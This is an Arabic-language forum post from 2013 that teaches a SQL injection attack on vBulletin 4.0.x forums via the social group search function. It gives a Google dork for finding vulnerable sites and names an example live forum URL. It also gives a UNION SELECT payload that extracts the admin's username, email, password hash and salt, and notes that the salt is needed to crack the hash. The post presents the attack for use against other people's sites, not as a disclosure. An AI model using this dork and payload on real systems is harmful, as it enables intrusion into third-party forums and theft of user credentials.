Admin
Admin
.gif "Admin")
عدد المساهمات : 424
تاريخ التسجيل : 23/07/2012
 | | موضوع: ثغرة في منتديات الفي بي vBulletin 4.0.x الجمعة أغسطس 23, 2013 9:51 am | |
| - اقتباس :
السلام عليكم و رحمة الله و بركاته
بسم الله الرحمن الرحيم
إخواني اليوم جايبلكم ثغرة حقن لقواعد البيانات sql injection في منتديات vBulletin الجيل الرابع الإصدارات الأولى 4.0.x
الملف المصاب هو socialgroup.php و سكربت البحث searchtools.php
-----------------------------------------------
نجي للمهم
1- طريقة البحث في العم قوقل ضع هذا الدورككود PHP: - الكود:
-
inurl:"search.php?search_type=1" intext:vbulletin 4
2-إستغلال الثغرة
ستجد الكثير من النتائج في قوقل ادخل على واحدة على سبيل المثال
http://forums.millennium.com/search.php?search_type=1
في منتصف الصفحة فوق خانة الكلمة التي سنبحث عنها اذهب إلى
"Search Multiple Content Types"
ثم ضح صح على خيار groups أو مجموعات
ثم ضع كلمة و ابحث
ثم الحقن يكون كالتاليكود PHP: - الكود:
-
UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
بعد الرابط و النتيجة
ستظهر لنا اليوزر و إيميل و باسوورد الأدمن مشفر و السالت أي نوع التشفير لأنه مهم لنستطيع فك التشفير
ملاحظة " النسخة 4.1.3 vBulletin لا تحوي هذه الثغرةدمتم بود و السموحة على التقصير | |
|
